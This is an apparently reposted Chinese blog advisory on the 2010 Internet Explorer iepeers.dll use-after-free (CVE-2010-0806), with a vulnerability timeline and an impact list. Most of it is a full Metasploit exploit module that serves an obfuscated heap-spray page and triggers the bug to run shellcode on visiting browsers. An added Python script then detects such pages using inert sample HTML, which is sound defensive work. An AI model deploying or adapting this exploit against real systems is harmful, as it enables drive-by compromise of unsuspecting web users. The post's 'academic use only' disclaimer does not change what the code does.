IE 0day vulnerability in iepeers.dll (a favourite for web-based malware; affects a broad user base)
Published: 2010-3-10
KB981374 orange alert
A new 0day vulnerability has surfaced in Internet Explorer. It may allow remote code execution: an attacker can exploit it by crafting a special web page and then luring users into visiting that page through e-mail, IM messages or other deceptive means.
1. Vulnerability timeline:
2010.3.10 Microsoft published security advisory KB981374 and said it would release an out-of-band patch to fix the vulnerability (normally Microsoft only starts the out-of-band patch process for particularly serious security vulnerabilities).
2. Vulnerability summary:
This new IE vulnerability lies in the iepeers.dll component and affects IE6/IE7; it is already being traded on the underground black market. IE8 is not affected by it.
3. Impact:
1 Primarily affected users:
XP with IE6/IE7
2 Possibly affected users
Vista with IE7: Protected Mode reduces the impact
Windows 2003 with IE7: restricted mode can reduce the impact
3 Unaffected users
IE8 users
Windows 2000 with IE5
Code:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes

##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Internet Explorer iepeers.dll use-after-free',
      'Description' => %q{
        This module exploits a use-after-free vulnerability within iepeers.dll of
        Microsoft Internet Explorer versions 6 and 7.
        NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'Trancer <mtrancer[at]gmail.com>'
      ],
      'Version'     => '$Revision:$',
      'References'  =>
        [
          [ 'CVE', '2010-0806' ],
          [ 'OSVDB', '62810' ],
          [ 'BID', '38615' ],
          [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
          [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'             => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'     =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'    => 'win',
      'Targets'     =>
        [
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
        ],
      'DisclosureDate' => 'Mar 09 2010',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Set the return / nops
    ret = Rex::Text.to_unescape([target.ret].pack('V'))

    # Randomize the javascript variable names
    j_shellcode  = rand_text_alpha(rand(100) + 1)
    j_nops       = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock  = rand_text_alpha(rand(100) + 1)
    j_memory     = rand_text_alpha(rand(100) + 1)
    j_counter    = rand_text_alpha(rand(30) + 2)
    j_ret        = rand_text_alpha(rand(100) + 1)
    j_array      = rand_text_alpha(rand(100) + 1)
    j_function1  = rand_text_alpha(rand(100) + 1)
    j_function2  = rand_text_alpha(rand(100) + 1)
    j_object     = rand_text_alpha(rand(100) + 1)
    j_id         = rand_text_alpha(rand(100) + 1)

    # Build out the message
    html = %Q|<html><body>
<button id='#{j_id}' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
  var #{j_shellcode} = unescape('#{shellcode}');
  #{j_memory} = new Array();
  var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
  var #{j_nops} = unescape('#{ret}');
  while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
  var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
  delete #{j_nops};
  for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
    #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
  }
}
function #{j_function2}(){
  #{j_function1}();
  var #{j_object} = document.createElement('body');
  #{j_object}.addBehavior('#default#userData');
  document.appendChild(#{j_object});
  try {
    for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
      #{j_object}.setAttribute('s',window);
    }
  } catch(e){ }
  window.status+='';
}
document.getElementById('#{j_id}').
</script></body></html>|

    print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end
end
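From a defender's side, the module above has a recognisable shape in the HTML it serves: a %u-encoded return address (0x0C0C0C0C) that is doubled in a while-loop into a slide, a large array fill that sprays that slide, and the `#default#userData` behaviour bound to a freshly created body element with `window` passed to `setAttribute`. The following Python triage script is an added example written for this page; it is not part of the original post or of Trancer's module. It decodes `unescape()` literals, links them to the doubling loop they feed, and reports the spray value and the userData trigger. The sample pages, variable names and thresholds (100 array entries) are constructed assumptions for illustration.

```python
import re
import struct
from typing import List, Optional, Tuple

# Indicators taken from the module above. All of them are triage heuristics
# for proxy logs, mail gateways or sandbox captures, not proof of exploitation.
UNESCAPE_ASSIGN_RE = re.compile(
    r"(?:var\s+)?(\w+)\s*=\s*unescape\(\s*['\"]((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2})+)['\"]\s*\)"
)
# while(x.length < N) { x += x; }  -> the string-doubling loop that builds a spray slide
DOUBLING_LOOP_RE = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<[^)]*\)\s*\{\s*\1\s*\+=\s*\1\s*;?\s*\}"
)
# for(i=0; i<N; i++) { arr[i] = ... }  -> the array fill that commits the spray
ARRAY_FILL_RE = re.compile(
    r"for\s*\(\s*(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;\s*\1\+\+\s*\)\s*\{\s*\w+\s*\[\s*\1\s*\]\s*="
)
USERDATA_RE = re.compile(r"addBehavior\(\s*['\"]#default#userData['\"]\s*\)")
SETATTR_WINDOW_RE = re.compile(r"\.setAttribute\(\s*['\"]\w+['\"]\s*,\s*window\s*\)")


def decode_unescape(literal: str) -> bytes:
    """Decode a JavaScript unescape() literal: %uXXXX is a UTF-16LE code unit, %XX a byte."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", literal):
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def repeated_word(data: bytes) -> Optional[int]:
    """Return the 32-bit little-endian value if data is one 4-byte word repeated, else None."""
    if len(data) < 4 or len(data) % 4:
        return None
    if data != data[:4] * (len(data) // 4):
        return None
    return struct.unpack("<I", data[:4])[0]


def scan_html(html: str) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs found in a page body."""
    findings = []
    doubled = {m.group(1) for m in DOUBLING_LOOP_RE.finditer(html)}
    for m in UNESCAPE_ASSIGN_RE.finditer(html):
        name, literal = m.group(1), m.group(2)
        if name in doubled:  # only literals that feed a doubling loop count as a slide
            word = repeated_word(decode_unescape(literal))
            value = "0x%08X" % word if word is not None else "non-uniform slide"
            findings.append(("heap_spray_slide", "%s doubled in a loop, slide value %s" % (name, value)))
    counts = [int(m.group(2)) for m in ARRAY_FILL_RE.finditer(html)]
    if counts and max(counts) >= 100:  # assumed threshold for "spray-sized" fills
        findings.append(("large_array_fill", "%d blocks" % max(counts)))
    if USERDATA_RE.search(html) and SETATTR_WINDOW_RE.search(html):
        findings.append(("userdata_window_trigger",
                         "addBehavior('#default#userData') with setAttribute(..., window)"))
    return findings


def verdict(findings: List[Tuple[str, str]]) -> str:
    kinds = {k for k, _ in findings}
    if "userdata_window_trigger" in kinds and "heap_spray_slide" in kinds:
        return "likely CVE-2010-0806 exploit page"
    if "heap_spray_slide" in kinds or "large_array_fill" in kinds:
        return "heap spray indicators"
    return "no indicators"


# Constructed sample: the shape of the page served by the module, with an inert
# placeholder in place of shellcode and no click trigger.
SUSPICIOUS_PAGE = """<html><body><button id='b1' style='display:none'></button>
<script>
function fill(){
 var sc = unescape('%u4141%u4242');
 mem = new Array();
 var slack = 0x86000-(sc.length*2);
 var nops = unescape('%u0c0c%u0c0c');
 while(nops.length<slack/2) { nops+=nops; }
 var block = nops.substring(0,slack/2);
 for(i=0; i<270; i++) { mem[i] = block + block + sc; }
}
function go(){
 fill();
 var o = document.createElement('body');
 o.addBehavior('#default#userData');
 document.appendChild(o);
 try { for (i=0; i<10; i++) { o.setAttribute('s',window); } } catch(e){}
}
</script></body></html>"""

# Constructed sample: legitimate userData use and a small loop, no spray.
BENIGN_PAGE = """<script>
var q = unescape('%20hello%20'); document.title = q;
var items = new Array(); for(i=0; i<3; i++) { items[i] = i; }
var o = document.createElement('div'); o.addBehavior('#default#userData');
o.setAttribute('s','x'); o.save('prefs');
</script>"""

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        f = scan_html(page)
        print(label, "->", verdict(f), f)
```

The link between the `unescape()` literal and the loop that doubles it is what keeps false positives down: a page that merely calls `unescape('%20')` or uses `#default#userData` to persist form state triggers nothing, while the combination of a repeated-word slide, a spray-sized fill and `window` handed to `setAttribute` on a detached body element matches the page above.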
PS: The reason for publishing the code is that the patch is already out. Please apply it promptly, or you will regret it!
Friendly reminder: this code is dangerous; use it with caution!
Formal statement: the bug material I provide is for academic exchange only; I accept no legal liability arising from it. Please take note!
Reposted from: https://blog.51cto.com/isun0804/287736